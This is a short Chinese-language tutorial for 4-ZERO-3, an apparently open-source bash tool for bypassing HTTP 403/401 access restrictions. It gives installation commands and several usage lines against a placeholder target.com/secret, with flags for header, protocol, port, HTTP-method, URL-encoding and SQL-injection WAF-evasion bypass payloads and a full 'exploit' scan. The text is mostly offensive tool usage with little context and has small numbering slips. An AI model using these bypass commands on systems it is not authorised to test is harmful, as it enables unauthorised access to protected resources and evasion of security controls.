4-ZERO-3:绕过 403/401 的工具
4-ZERO-3 是 GitHub 上提供的免费开源工具。这是一个 bash 脚本。4-ZERO-3 用于绕过任何域上的 403 和 401 技术障碍。使用 4-ZERO-3 工具执行绕过时,内容长度很重要。如果您在绕过时看到多个 200,则必须检查内容长度。如果发现任何绕过,4-ZERO-3 可以自动卷曲 Payload。
安装
第 1 步:使用以下命令从 Github 安装该工具。
git clone https://github.com/Dheerajmadhukar/4-ZERO-3
第 2 步:使用以下命令运行该工具。
bash 403-bypass.sh
该工具已成功安装并运行。现在我们将看到使用该工具的示例。
用法
示例 1:使用 4-ZERO-3 工具使用域的内容标头执行 403/402 绕过。
bash 403-bypass.sh -u https://target.com/secret –header
示例 2:使用 4-ZERO-3 工具使用域的内容协议执行 403/402 绕过。
bash 403-bypass.sh -u https://target.com/secret –protocol
示例 3:使用 4-ZERO-3 工具执行基于 PORT 的旁路/有效负载。
bash 403-bypass.sh -u https://target.com/secret –port
示例 4:使用 4-ZERO-3 工具执行基于 HTTP 方法的绕过/有效负载
bash 403-bypass.sh -u https://target.com/secret –HTTPmethod
示例 4:使用 4-ZERO-3 工具执行 URL 编码绕过/有效负载
bash 403-bypass.sh -u https://target.com/secret –encode
示例 5:使用 4-ZERO-3 工具执行 MySQL mod_Security & libinjection bypasses/payloads [** New **]
bash 403-bypass.sh -u https://target.com/secret –SQLi
示例 6:使用 4-ZERO-3 工具对端点 [–exploit] 执行完整扫描 {包括所有漏洞利用/有效负载}
bash 403-bypass.sh -u https://target.com/secret –exploit